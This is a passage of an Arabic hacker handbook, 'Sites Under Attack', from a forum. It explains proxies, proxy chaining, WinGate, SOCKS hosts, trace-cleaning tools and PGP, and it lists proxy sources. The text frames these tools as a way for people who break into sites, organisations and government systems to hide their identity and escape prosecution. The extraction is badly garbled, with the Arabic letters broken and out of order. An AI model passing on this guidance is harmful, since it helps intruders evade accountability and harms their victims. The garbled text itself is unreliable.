‫ﺘ ﺮﻧ ﺖﻫﯿﺴ‬ ‫ﺘﻮري)ﻛﺎﻟﻜﻮﻛﯿﺰ واﻻﻧ‬ ‫اﻟﻬﯿﺴ‬
‫اﻟﻠﻮ ق(وﻫﻨﺎﻟﻚﺑ ﺮﻧﺎﻣ ﺞ راﺋﻊ ﯾﻜﻔﯿﻚ ﻣﺆوﻧﺔﻫﺬه اﻻﻋﻤﺎ لاﺳﻤﻪ ‪ windows washer‬ﯾﺠﺐان ﯾﻜﻮنﻟﺪﯾﻚ‪.‬‬
‫ﺘﺐ ‪how to Be anonymous on the web‬او ‪how to‬‬ ‫واﻟﻜﺜﯿ ﺮ‪.‬اذﻫﺐﻟﺠﻮﺟ ﻞ واﻛ‬
‫و ﻻﺗﻨﺴﻰا ل‪Preety Good Privacy (PGP)d‬اﻧﻪ ﻣﺠﺎﻧﻲ ‪ ..‬ﯾﺠﺐان ﯾﻜﻮن ﻋﻨﺪكﻟﻮﻛﻨ ﺖﺗ ﺮﯾﺪ‬
‫ﺘﺸﻔﯿ ﺮ ‪...‬‬
‫ﺘ ﺮكاﯾﻤﯿﻠﻚﻓﯿﻪ!ﻓﻬﻮ ﺟﻤﯿ ﻞ ﺟﺪاﻓﻲ ﻋﻤﻠﯿﺔاﻟ‬ ‫ﻗﻊ وﺗ‬ ‫ﺘ ﺮا ق ﻣﻮ‬
‫اﺧ‬
‫ﺘﻄﯿﻊانﺗ ﺤﺼ ﻞ ﻋﻠﯿﻪ ﻣﻦ‪/http://www .pgpi.org :‬‬ ‫ﺗﺴ‬

‫ﺘﻚ‬ ‫ﺘﺨﻔﻲ وا ﺧﻔﺎ ءﻫﻮﯾ‬ ‫ﺘﻔﺼﯿ ﻞﻟﺒﻌ ﺾ ﻣﻦاﻻﻣﻮراﻟﻬﺎﻣﺔ وﺳﻨﺬﻛ ﺮ ﻫﻨﺎﺑﻌ ﺾاﻟﻄ ﺮ قﻟﻠ‬ ‫ﺳﺄﺷ ﺮ حاﻻنﺑﺸﺊ ﻣﻦاﻟ‬
‫ﻓﻲاﻟﺸﺒﻜﺔ ‪:‬‬
‫‪Proxy - Sock Host - Wingate‬‬
‫‪-------------------------------------------‬‬
‫ـ ‪ Proxy Server‬؟؟؟‬ ‫ﻣﺎ ﻫﻮاﻟ‬
‫ﺘﻠﻔﺔ ﺳﻮا ء ﻣﻊ‬ ‫) ‪ proxy server‬ﺧﺎدم ﺎﻟﻮﻛﯿ ﻞ(ﻫﻮ ﺧﺎدم ‪ server‬ﻧﻘﻮم ﻣﻦ ﺧﻼﻟﻪﺑﻌﻤﻠﯿﺎ تاﻻﺗﺼﺎ لاﻟﻤﺨ‬
‫ﺘ ﺮﻧ ﺖ ﻣﻦ ﺧﻼ ل ‪proxy‬‬ ‫ﻗﻊاو ﻣﻊاﻻﺟﻬﺰةاﻻ ﺧ ﺮى ﻣﻦ ﺧﻼ لاﻟﺸﺎ ت وووو ‪..‬اﻟ ﺦ ﻓﻌﻨﺪاﺗﺼﺎﻟﻚﺑﺎﻹﻧ‬ ‫اﻟﻤﻮا‬
‫ﺘﻢاﻻﺗﺼﺎ ل‬ ‫ﻗﺒ ﻞﻛ ﻞ ﺷﻲ ءﺛﻢ ﯾ‬ ‫ﺘﺨﺪمأوﻻ و‬ ‫‪server‬ﻓﺈن ﺟﻤﯿﻊاﺗﺼﺎﻻﺗﻚ ﺳﻮ فﺗﺬﻫﺐإﻟﻰ ﻫﺬااﻟﺒ ﺮوﻛﺴﻲاﻟﻤﺴ‬
‫ﺘ ﺮﻧ ﺖ‬‫ﺘﺼ ﻞﺑﺎﻹﻧ‬ ‫ﻗﻊاﻟﻤﻄﻠﻮب ‪....‬ﻓﻤﺜﻼإذاأرد تأنﺗ‬ ‫ﺘﻜﻮناﻻﺟﺎﺑﺔﻫﻲﺗ ﺤﻤﯿ ﻞاﻟﻤﻮ‬ ‫ﻗﻊاﻟﻤﻄﻠﻮبﻟ‬ ‫ﺑﺴﯿ ﺮﻓ ﺮاﻟﻤﻮ‬
‫ﻗﻌﺎﻛﻬﺬا‬‫ﺘﺢ ﻣﻮ‬ ‫ﺘﺼﻔﺢ وﺗﻔ‬ ‫ﺘﺨﺪام ‪ proxy server‬وﺗ ﺮﯾﺪﺄنﺗ‬ ‫ﻣﻦ ﺧﻼ لاﺳ‬
‫‪ .. http://www.3asfh.com/vb/‬ﻋﻠﯿﻚأوﻻﺑﺎﻟﻄﻠﺐ ﻣﻦﻫﺬا ‪proxy server‬ﺛﻢ ﯾﻘﻮم ‪proxy‬‬
‫ﻗﻊ وﻣﻦﺛﻢ‬ ‫‪server‬ﺑﻄﻠﺐاﻟﺼﻔ ﺤﺔ ‪ http://www .3asfh.com/vb/‬ﻣﻦ ﺧﺎدم ‪ server‬ﺎﻟﻤﻮ‬
‫ﺘﻌ ﺮا ض ﻫﺬهاﻟﺼﻔ ﺤﺔ ‪...‬‬ ‫ﺘﻄﯿﻊا ﺳ‬ ‫ﺗ ﺤﻤﯿﻠﻬﺎ وﺗﺨﺰﯾﻨﻬﺎﻟﺪﯾﻚﺑﻤﻌﻨﻰاﻧﻚ ﺳﻮ فﺗﺴ‬
‫ﺘﻬﻠﻚﻓﻲ‬ ‫ﻗ ﺖاﻟﻤﺴ‬ ‫ﺘﺄﻛﯿﺪأن ﻫﺬهاﻟﻌﻤﻠﯿﺔﺗﺄ ﺧﺬﻛﻤﯿﺔﻗﻠﯿﻠﺔ ناﻟﺒﯿﺎﻧﺎﺗﻤﻘﺎرﻧﺔ ﻣﻊاﻟﻮ‬ ‫ﺘﻼ ﺣﻆ ﻣﻦ ﺧﻼ ل ﻣﺎ ذﻛ ﺮ تﺑﺎﻟ‬ ‫ﺳ‬
‫ﻗ ﻞ ﻣﻘﺎرﻧﺔﺑﺎﻹﺗﺼﺎ ل ﺎﻟﻌﺎدي )ﺑﺪونﺑ ﺮوﻛﺴﻲ(‬ ‫ﻗ ﺖأ ﻃﻮ ل وﻛﻤﯿﺔاﻟﺒﺎﺗﺎ تاﻟﻮا ﺻﻠﺔاﻟﯿﻨﺎا‬ ‫ﻃﻠﺐ ﻫﺬهاﻟﺼﻔ ﺤﺔﻓﺎﻟﻮ‬
‫ﺘﻢﺗ ﺤﻤﯿﻠﻬﺎ ﻣﺒﺎﺷ ﺮة‬‫ﻗﻊاﻟﻤﻄﻠﻮبﺛﻢ ﯾ‬ ‫ﺘﺠﻪاﻟﻄﻠﺐ ﻣﺒﺎﺷ ﺮة ﻣﻨﻚاﻟﻰ ﺳﯿ ﺮﻓ ﺮاﻟﻤﻮ‬ ‫ﻗ ﺖ ﻃﻠﺐاﻟﺼﻔ ﺤﺔ ﺳﯿ‬ ‫ﺣﯿﺚ ﻣﻦ و‬
‫ﻗ ﻞ ‪...‬اذن ﻣﻊاﺗﺼﺎﻟﻚﺑﻠﻠﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ ﺳﻮ ف ﯾﺼﺒﺢاﺗﺼﺎﻟﻚ‬ ‫ﻗ ﺖا‬‫ﺘﺼﻔ ﺤﻚﻓﻲ و‬ ‫ﺘﻌ ﺮ ﺿﻬﺎﻓﻲ ﻣ‬ ‫ﺑ ﺤﯿﺚﺗﺴ‬
‫ﺘﻌ ﺮ ﺿﻬﺎﺗﺬﻫﺐﺈﻟﻰ‬ ‫ﺘ ﺤﻤﯿﻠﻬﺎأيﺗﺴ‬ ‫ﺘ ﺮﻧ ﺖﺑﻄﻲ ء ﻣﻘﺎرﻧﺔ ﻣﻊاﻻﺗﺼﺎ لاﻟﻤﺒﺎﺷ ﺮ وذﻟﻚﻷنﻛ ﻞ ﺻﻔ ﺤﺔﺗﻘﻮمﺑ‬ ‫ﺑﺎﻹﻧ‬
‫ﺘﺼﻔﺢاﻻﻓﻲ ﺣﺎﻟﺔ ﻧﺎدرة وﻫﻮان ﯾﻜﻮن‬ ‫ﻫﺬااﻟﺒ ﺮوﻛﺴﻲ ‪ proxey server‬ﻣﻤﺎﯾﺆدياﻟﻰاﺑﻄﺎ ء ﻋﻤﻠﯿﺔاﻟ‬
‫ﺘﻔ ﻖ وانﺗٌﻄﻠﺐ ﻧﻔ ﺲاﻟﺼﻔ ﺤﺔ‬ ‫ﺘﻲﺗﻮﺟﺪﺑﻬﺎاﻧ ﺖ ‪.‬اوان ﯾ‬ ‫ﺘﺨﺪمﻗ ﺮﯾﺐ ﻣﻦاﻟﻤﻨﻄﻘﺔاﻟ‬ ‫اﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮاﻟﻤﺴ‬
‫ﻗ ﺖ ﺳﺎﺑ ﻖﻗﺒ ﻞ ﻃﻠﺒﻚﻟﻬﺬه‬ ‫ﺘﺨﺪﻣﺔاﻧ ﺖﻓﻲ و‬ ‫ﺘﻬﺎ ﻣﻦ ﺷﺨ ﺺا ﺧ ﺮﻟﻪ ﻧﻔ ﺲاﻟﺒ ﺮوﻛﺴﻲاﻟﺬيﺗﺴ‬ ‫ﺘﻲاﻧ ﺖ ﻃﻠﺒ‬ ‫اﻟ‬
‫اﻟﺼﻔ ﺤﺔ ‪.‬‬
‫]‪[User] >>>>>>>>>> [Proxy] >>>>>>>>>> [Web Page‬‬
‫ﺘﺨﺪماﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ؟‬ ‫ﻟﻤﺎذا ﻧﺴ‬
‫ﺘﻲﺗﻘﻮمﺑﻬﺎ ﻋﻠﻰ ﻫﺬه‬ ‫ﺘﻚ واﻟﺒﻘﺎ ء ﻣﺠﻬﻮﻻﻓﻚ ﻋﻤﻠﯿﺎﺗﻚاﻟ‬ ‫ﻟﻌﺪةاﺳﺒﺎب ‪:‬اﻟﺴﺒﺐاﻟ ﺮﺋﯿﺴﻲﻫﻮﻟﻠ ﺤﻔﺎظ ﻋﻠﻰ ﻫﻮﯾ‬
‫ﺘﻰﻟﻮﺗﻢا ﺻﻄﯿﺎدكﻓﺎﻧﻨﻬﻢ ﺳﯿ ﺤﺼﻠﻮن ﻋﻠﻰ‬ ‫ﻗﺒﺔ ﻣﻦاﻷﻋﯿﻦﻓﻲﻛ ﻞ ﻣﻜﺎنﺑ ﺤﯿﺚاﻧﻪ ﺣ‬ ‫اﻟﺸﺒﻜﺔاﻟﻤﻜﺸﻮﻓﺔ واﻟﻤ ﺮا‬
‫ﻗﻊاﻟﻤﻄﻠﻮبﻛﻤﺎ‬ ‫ﺘﺨﺪمﻓﻲ ﻋﻤﻠﯿﺔاﻻﺗﺼﺎ لﻻﻧﻪﻫﻮاﻟﺬي ﯾﻘﻮمﺑﻌﻤﻠﯿﺔاﻻﺗﺼﺎ لﺑﺴﯿ ﺮﻓ ﺮاﻟﻤﻮ‬ ‫‪ip‬اﻟﺒ ﺮوﻛﺴﻲاﻟﻤﺴ‬
‫ﻗﻮ لﺑﺄﻧﻪ ﻻ ﯾﻤﻜﻦاﻟﻮﺻﻮ لاﻟﯿﻚ ‪...‬‬ ‫ﻗﻊاﻟﻤﻄﻠﻮب ‪ .‬واﻧﺎ ﻻأ‬ ‫ﺘﺨﺪم وﺳﯿ ﺮﻓ ﺮاﻟﻤﻮ‬ ‫ذﻛ ﺮﻧﺎﻓﻬﻮاﻟﻮﺳﯿﻂﺑﯿﻦاﻟﻤﺴ‬

‫‪٤١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺨﺪاﻣﻚﻟﻌﺪداﻛﺒ ﺮ ﻣﻦ‬ ‫ﺘﻬﺎ ﻫﻮاﺳ‬ ‫ﯾﻤﻜﻦ وﻟﻜﻦﺑﺼﻌﻮﺑﺔﺑﺎﻟﻐﺔ وﻋﻤﻠﯿﺎ تﺗﻘﻔﻲ ﻃﻮﯾﻠﺔ وﻣﻤﺎ ﯾﺰﯾﺪ ﻣﻦ ﺻﻌﻮﺑ‬
‫اﻟﺒ ﺮوﻛﺴﯿﺎ ت‬
‫ﻗﻊاﻟﻤﻬﻤﺔﻓﻔﻲﻛﺜﯿ ﺮ ﻣﻦاﻟﺪو ل‬ ‫ﺳﺒﺐا ﺧ ﺮاناﻏﻠﺐ ﻣﺰودياﻟﺨﺪﻣﺔ ‪ ISP‬ﯾﻘﻮﻣﻮنﺑ ﺤﺠﺐاﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﻤﻮا‬
‫ﻗﻊ‬‫ﻗﻊاﻟﻬﻜ ﺮ ﺑﻨﺴﺒﺔ ‪ %٤٠‬ﻣﻐﻠﻘﺔاواﻛﺜ ﺮ واﻧﺎاﺗﻜﻠﻢ ﻋﻠﻰاﻟﻤﻮا‬ ‫ﻛﺎﻟﺴﻌﻮدﯾﺔ واﻻﻣﺎرا ت وﻏﯿ ﺮﻫﺎ ﻧﺠﺪان ﻣﻮا‬
‫ﻗﻊ‬
‫اﻻﺟﻨﺒﯿﺔ وﻟﯿﺴ ﺖاﻟﻌ ﺮﺑﯿﺔاﻟﻰ ﻏﯿ ﺮ ذﻟﻚ ‪ ...‬ﻓﻬﻨﺎﺗ ﻀﻄ ﺮاﻟﻰاﻟﻠﺠﻮ ءاﻟﻰاﻟﺒ ﺮوﻛﺴﯿﺎ تﻟﻠﻮﺻﻮ لاﻟﻰﻫﺬهاﻟﻤﻮا‬
‫ﺘﻲاﻧ ﺖﺑﻬﺎﻛﺎنادا ء‬ ‫ﻧﻘﻄﺔﻫﺎﻣﺔ ‪ :‬ﺿﻌﻬﺎﻓﻲ ﺣﺴﺒﺎﻧﻚ وﻫﻲﻛﻠﻤﺎﻛﺎناﻟﺒ ﺮوﻛﺴﻲﻗ ﺮﯾﺒﺎ ﻣﻦاﻟﻤﻨﻄﻘﺔاﻟ‬
‫اﻟﺒ ﺮوﻛﺴﻲاﺳ ﺮ ع ‪.‬‬

‫‪) Proxy Chaining‬وﺗﻌﻨﻲ ﺳﻠﺴﻠﺔﺑ ﺮوﻛﺴﯿﺎ ت(‬


‫‪----------------------‬‬
‫ﺘﺒ ﺮﻓﻌﺎﻟﺔ ﺟﺪاﻓﻲا ﺧﻔﺎ ءاﻟﻬﻮﯾﺔﻟﻜﻨﻬﺎ ﻏﯿ ﺮﻓﻌﺎﻟﺔﺗﻤﺎﻣﺎﻓﻲ ﺳ ﺮﻋﺔاﻻﺗﺼﺎ ل ﺣﯿﺚﻛﻠﻤﺎ زاد ﻋﺪد‬ ‫وﻫﻲﺗﻌ‬
‫اﻟﺒ ﺮوﻛﺴﯿﺎ تﻛﻠﻤﺎاﺻﺒﺢاﻻﺗﺼﺎ لاﺑﻄﺄ ‪٠...‬‬
‫ﻣﺜﺎ ل‪/‬‬
‫]‪[User]>>>>>[Proxy 1]>>>>>[Proxy 2]>>>>>[Proxy n]>>>>>[wep page‬‬
‫ﻗﻊاﻟﻤﻄﻠﻮب وﻟﯿﺴﺎ‬ ‫ﺘﺼ ﻞﺑﺎﻟﻤﻮ‬
‫ﺘﺼ ﻞﺑﺎﻟﺒ ﺮوﻛﺴﻲاﻻو لﺛﻢﺑﺎﻟﺜﺎﻧﻲﺛﻢﺑﺎﻟﺜﺎﻟﺚﺛﻢ ‪...‬اﻟﻰانﺗ‬ ‫ﺘ‬‫وﻛﻤﺎ ﻧ ﺮىﻓﺎﻧﻚ ﺳ‬
‫ﻗﻌﺎﻓﻘﺪ ﯾﻜﻮن ‪.. ftp‬اﻟ ﺦ ‪.‬‬ ‫ﺷ ﺮ ﻃﺎﺑﺎن ﯾﻜﻮن ﻣﻮ‬
‫ﻗﺐ‬ ‫ﺘ ﺮ ق و ﺧﺼﻮ ﺻﺎاذا ﺷﻌ ﺮﺑﺎﻟﺨﻄ ﺮ واﻧﻪ ﻣ ﺮا‬
‫ﺘﺨﺪام ﺳﻠﺴﻠﺔ ﻣﻦاﻟﺒ ﺮوﻛﺴﯿﺎ تاﻣ ﺮ ﺿ ﺮوريﻟﻜ ﻞ ﻣﺨ‬ ‫ﺎذنﻓﺎﺳ‬
‫ﺘﻮ ﺧﻰاﻟ ﺤﺬر داﺋﻤﺎ وذﻟﻚ ﺣﺴﺐ ﻣﺒﺪأ "‪ " paranoid‬اﻟﻤﻌ ﺮو فﻟﻜ ﻞﻫﻜ ﺮ ‪....‬‬ ‫وﯾﺠﺐ ﻋﻠﯿﻪان ﯾ‬

‫ﺘﺒﺎرﻫﺎ وﺗ ﺤﺪﯾﺜﻬﺎ ‪...‬‬


‫ﺘ ﺤﺪ ث ﻋﻦﻛﯿﻔﯿﺔاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟﺒ ﺮوﻛﺴﯿﺎ ت و ﻃ ﺮﯾﻘﺔا ﺧ‬ ‫ﻓﻲ ﻧﻬﺎﯾﺔاﻟﻤﻄﺎ ف ﺳﻨ‬
‫‪ http://www.multiproxy.org/anon_list.htm‬وﻫﺬااﻟﻤﻔ ﻀ ﻞﻟﺪي ‪.‬‬
‫‪http://tools.rosinstrument.com/proxy/‬‬
‫او ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﺠﻤﻮﻋﺔاﻟﺒ ﺮوﻛﺴﻲاﻟﺸﻬﯿ ﺮة ﻋﺒ ﺮاﻟﯿﺎﻫﻮ ‪P_R_O_X_Y@yahoogroups.com‬‬
‫ﺘﻚﺑﺄ ﺣﺪ ثاﻟﺒ ﺮوﻛﺴﯿﺎ ت و ﻃ ﺮﯾﻘﺔاﻻﻧ ﻀﻤﺎماﻟﯿﻬﻢ ﻫﻮﺑﺎرﺳﺎ ل رﺳﺎﻟﺔﻓﺎرﻏﺔاﻟﯿﻬﻢ وﻓﻲ‬ ‫وﻫﻲﺗﻘﻮمﺑﻤ ﺮاﺳﻠ‬
‫ﺘﺐ ‪ P_R_O_X_Y-subscriber@yahoogroups.com‬و ﺳﻮ فﺗ‬
‫ﺘﻠﻘﻰ‬ ‫ﻋﻨﻮاناﻟﻤ ﺮﺳ ﻞاﻟﯿﻪاﻛ‬
‫رد ﻣﺒﺎﺷ ﺮة وﺗﺼﺒﺢ ا ﺣﺪاﻋ ﻀﺎ ءاﻟﺠ ﺮوب ‪..‬‬
‫ﻗﻊﺗﻮﻓ ﺮﻟﻚ ﻫﺬهاﻟﺨﺪﻣﺔ وأﺷﻬ ﺮﻫﺎ ﻫﻮ‬ ‫ﺘﺄﻛﺪ ﻣﻦ ﻋﻤ ﻞاﻟﺒ ﺮوﻛﺴﻲ ﻣﻦ ﺧﻼ ل ﻋﺪة ﻣﻮا‬ ‫ﺘﻄﯿﻊاﻟ‬‫وﺗﺴ‬
‫‪http://www.proxytester.com/‬‬

‫‪++++++++++++++++++++++++++++++++++++++++++++++++++++++++++‬‬
‫ﻣﺎﻫﻮ ‪ WinGate‬؟‬
‫ﺘﻮي ﻋﻠﻰ‬ ‫ﻫﻮ ‪proxy server firewall‬ﺄي ﯾﻔﻮ قاﻟﺒ ﺮوﻛﺴﻲ ﻮﻫﻮ ﺧﺎدمﺑ ﺮوﻛﺴﻲ ذو ﺣﺎﺟﺰ ﻧﺎري ﯾ ﺤ‬
‫ﺘﻲﺗﺒﻘﯿﻚ( ‪ Anonymously‬ﻣﺠﻬﻮ لاﻟﻬﻮﯾﺔ(‬ ‫ﺘﺼﺔﺑﺎﻟ ﺤﻤﺎﯾﺔ واﻟ‬ ‫ﺣﺰﻣﺔﻛﺒﯿ ﺮة و ﺿﺨﻤﺔ ﻣﻦاﻟﺒ ﺮاﻣ ﺞاﻟﻤﺨ‬
‫‪wingate‬‬
‫ﺘﺸﺎﺑﻪ ﻣﻊاﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ ﺣﯿﺚ ﯾﻌﻤ ﻞاﺗﺼﺎﻻ ت ﻣﻊﻛﻮﻣﺒﯿﻮﺗ ﺮﻟﺴﯿ ﺮﻓ ﺮ آ ﺧ ﺮ ﺧﻼ لاﻟﻤﻨﻔﺬ ‪23 ,‬ﻓﻲاﻟ ﺤﻘﯿﻘﺔ‬ ‫ﻣ‬
‫ﻫﻮاﺗﺼﺎ ل‪Telnet .‬‬
‫ﻛﯿﻔﯿﺔاﻟ ﺤﺼﻮ ل ﻋﻠﻰ‪ WinGate‬؟‬
‫ﻗﺎﺋﻚإذاﻛﺎنﻟﺪىا ﺣﺪ ﻣﻨﻬﻢ ‪.‬‬ ‫ﺑﺈﻣﻜﺎﻧﻚﺗﺎ ﺧﺬ ﻋﻨﻮان ‪ wingate‬ﻣﻦأ ﺻﺪ‬
‫ﺘﺼﺔﺑﺬﻟﻚ ﻣﺜ ﻞ ‪ WinGate Scanner‬ﺣﯿﺚ ﯾﺠﺐ ﻋﻠﯿﻚ‬ ‫ﺘﻄﯿﻊﻓﻌ ﻞ ذﻟﻚ ﻣﻦ ﺧﻼ لﺑ ﺮاﻣ ﺞﺑ ﺤﺚ ﻣﺨ‬ ‫اﯾ ﻀﺎﺗﺴ‬
‫ﻗﻲﻟﻠﺒ ﺮﻧﺎﻣ ﺞﻟﯿﻘﻮمﺑﻤﻬﺎﻣﻪ وﻟﻠﻤﺰﯾﺪ ﺣﻮ ل ﻫﺬااﻟﻤﻮ ﺿﻮ عأﻧﺼ ﺤﻜﻢ‬ ‫ﻓﻘﻂﺗ ﺤﺪﯾﺪا ل ‪ IP‬واﻟﻬﻮﺳ ﺖ ﻧﯿﻢ واﺗ ﺮكاﻟﺒﺎ‬
‫ﺘﺨﺪم ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ﻣﻦ‬ ‫ﺑﺎﻟﺒ ﺤﺚ ﻣﻦ ﺧﻼ ل ﺧﺎدماﻟﻬﻜ ﺮز )ﺟﻮﺟ ﻞ (ﻷن ﺧﺒﺮﺗﻲﻓﻲﻫﺬااﻟﻤﺠﺎ لﻗﻠﯿﻠﺔ وﻻﻧﻲﻟﻢاﺳ‬
‫ﻗﺒ ﻞ‬

‫‪٤٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ـ ‪ Socks Host‬؟‬ ‫ﻣﺎ ﻫﻮاﻟ‬


‫ﺘﺼ ﻞ ﻣﻦ ﺧﻼ لاﻟﻤﻨﻔﺬ ‪١٠٨٠‬‬‫ﺘﻼ ف وﻫﻮان ﺎﻟﺴﻮﻛ ﺲ ﯾ‬ ‫‪Socks Host‬ﺗﻘ ﺮﯾﺒﺎ ﻣﺜ ﻞ ‪WinGate‬ﻟﻜﻦاﻻ ﺧ‬
‫ﺘﺼﻔﺢ وذﻟﻚاﻣﺎﻓﻲ ‪ explorer‬أو‬ ‫ﺘ ﺤﻜﻢﻓﯿﻪ ﻣﻦ ﺧﻼ لاﻻﻋﺪاداﻟﻤﻮﺟﻮدةﻓﻲاﻟﻤ‬ ‫ﺘﻄﯿﻊاﻟ‬‫وﺗﺴ‬
‫ﺘﻚ‬
‫ﺘﺨﺪمﻛﺜﯿ ﺮاﻓﻲ ‪ Mirc‬ﻮﺗﻘﻮمﺑ ﺤﻤﺎﯾ‬‫‪ netscape‬وﺑﺈﻣﻜﺎﻧﻚإ ﺿﺎﻓﺔ ‪ Socks Host‬وﻫﺬهاﻟﻄ ﺮﯾﻘﺔﺗﺴ‬
‫ـ ‪FireWall‬‬‫وﺑﺈ ﺧﻔﺎ ء ‪ ip‬ﺎﻟﺨﺎ صﺑﻚ وﺗﻌﻤ ﻞﻛ‬
‫ﺘﺠﺪوﻧﻪ‬‫ﺘﺨﻔﻲ ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞ ‪ Ghost Surf‬وﺳ‬ ‫ﺘﻲﻗﺪﺗ ﺴﺎﻋﺪﻓﻲ ﻋﻤﻠﯿﺔاﻟ‬ ‫ﻮﻫﻨﺎﻟﻚاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺒ ﺮاﻣ ﺞاﻟ‬
‫ﺘﺎﺋ ﺞ ﻣﻦ ﺧﻼ ل ﻋﻤﻠﯿﺔﺑ ﺤﺚﺑﺴﯿﻄﺔﻓﻲ ﺟﻮﺟ ﻞ ‪...‬‬ ‫ﺘﻤﺎ ﻣﻦاو لاﻟﻨ‬‫ﺣ‬

‫‪٤٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﲪﺎﯾﺔ ﻫﻮﯾﺘﻚ ﰲ اﻟﻨﺖ "‬

‫‪$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000:‬‬
‫‪$$$$$$$$$$$$$$$$‬‬

‫ﺘﻰﺗﺼﺒﺢ ﻣﺠﻬﻮﻻ‪.‬‬ ‫ﺘﻚﻓﻲاﻟﻨ ﺖ ﺣ‬ ‫ﺣﻤﺎﯾﺔ ﻫﻮﯾ‬


‫**************************************************‬
‫ﻫﺬا ﻫﻮ ﺻﻠﺐ ﺎﻟﻤﻮ ﺿﻮ ع واﻟﺬي ﯾﺄ ﺧﺬاﻟﺠﺎﻧﺐاﻷﻫﻢ>>>‬
‫ﺎﻣﺎذا ﻫﺬهاﻷﻫﻤﯿﺔ؟؟ﻟﻤﺎذا ﻫﺬى ﺎﻟ ﺤ ﺮ ص ﻋﻠﻰاﻟﺒﻘﺎ ء ﻣﺠﻬﻮﻻ؟؟ﻟﻤﺎذاﻟﻤﺎذاﻟﻤﺎذا؟!!‬
‫ﻫﺬا ﻣﺎﺳﻮ فاﺟﯿﺐ ﻋﻠﯿﻪ===<<<< ﺻﺎر ﻣﺴﻠﺴ ﻞ==‬
‫ﻗﻬﻢ وﻏﯿ ﺮه‬ ‫ﺘ ﺮا‬
‫ﺘﻬﻢ ﻋﻨﺪا ﺧ‬
‫ﺘ ﺮﻓﯿﻦ وﻏﯿ ﺮﻫﻢ ﻣﻦ ﻋﺪم ﻣﻼ ﺣﻘ‬ ‫ﯾﺸﻐ ﻞﻫﺬااﻟﺠﺎﻧﺐاﻷﻫﻤﯿﺔاﻟﻜﺒ ﺮىﻟﺪىاﻟﻬﺎﻛ ﺮ ﺎﻟﻤ ﺤ‬
‫وﻟﻌﺪمﺗﻌ ﺮ ﺿﻬﻢﻟﻠﻤﻘﺎ ﺿﺎةﻓﻲ ﺎﻟﻤ ﺤﺎﻛﻢ واﻟﺴﺠﻮن‬
‫ﻟﻬﺬاﻫﻨﺎكﻗﺎﻋﺪةﺗﻘﻮ ل """<<ﺎ ﺣﻢ ﻧﻔﺴﻚﻗﺒ ﻞانﺗﻬﺎﺟﻢ""">>‬
‫ﻗﻊ ﺣﻜﻮﻣﻲاو ﻏﯿ ﺮها ﺧﺬاﻟ ﺤﯿﻄﺔ واﻟ ﺤﺬر ﻣﻦ ﻫﺬا‬ ‫ﻗﻊاو ﻣﻨﻈﻤﺔاو ﻣﻮ‬ ‫ﺘ ﺮا ق ﻣﻮ‬‫ﯾﻨﺒﻐﻲ ﻋﻠﻰﻛ ﻞ ﺷﺨ ﺺ ﯾ ﺮﯾﺪا ﺧ‬
‫اﻟﻤﻮ ﺿﻮ ع‪.....‬‬
‫ﺘﻰ ﺎﻓﻌ ﻞ ذﻟﻚ ‪:::‬‬‫ﯾﻘﻮ ل ﺳﺎﺋ ﻞﻛﯿ ﻒاﺑﻘﻰ ﻣﺠﻬﻮﻻ وﻣ‬
‫ﺎﻟﺠﻮاب‪:::‬‬
‫ﺘ ﺮﻧ ﺖ وﻫﻨﺎكﺑ ﺮاﻣ ﺞ وﻏﯿ ﺮﻫﺎ‬‫ﻫﻨﺎك ﻃ ﺮ قﻛﺜﯿﯿﯿﯿﯿﯿﯿﯿﯿﯿﯿﯿﯿ ﺮةﻟﺒﻘﺎﺋﻚ ﻣﺠﻬﻮﻻﻓﻲ ﺎﻷﻧ‬
‫ﺘﺨﻔﻲ؟؟؟‬ ‫ﻗﻮمﺑﻬﺬهاﻟ ﺤﻤﺎﯾﺔ واﻟ‬ ‫ﺘﻰا‬ ‫ً‪ :‬ﻣ‬
‫ﺣﺴﻨﺎ‬
‫ﺘ ﺮا قﻛﺎناﻧﺼ ﺤﻚﺑﺸﺪةﺑﻌﻤ ﻞﻫﺬهاﻟﺨﻄﻮا ت‪::‬‬ ‫ﺘ ﺮا قايا ﺧ‬‫ﻋﻨﺪﻣﺎﺗ ﺮﯾﺪاﻷ ﺧ‬
‫ﺘﺨﺪمﺑ ﺮوﻛﺴﻲ!!!ﻛﯿ ﻒ وﻣﻦاﯾﻦ؟؟؟‬ ‫ـاﺳ‬ ‫ـ‬
‫ـ‬‫ـ‬
‫‪١‬‬
‫ﺘﻲ‬‫ﺘ ﺮكﻓﻲﻗﻮاﺋﻢاﻟﺒ ﺮوﻛﺴﯿﺎ ت وﻣﻨﻬﺎﻫﺬهاﻟﻘﺎﺋﻤﺔاﻟ‬ ‫ﺘﻰﺗﺼﺒﺢ ﻣﺠﻬﻮﻻﻗﻢﺑﺎﻷﺷ‬ ‫ﺎوﻛﻲﻟﺠﻠﺐاﻟﺒ ﺮوﻛﺴﻲ و ﺣ‬
‫اﺻﺒ ﺤ ﺖ ﺧﺎﻣﻠﺔاﻷن وﻻادريﻟﻤﺎذا ‪p_r_o_x_y@yahoogroup.com‬‬
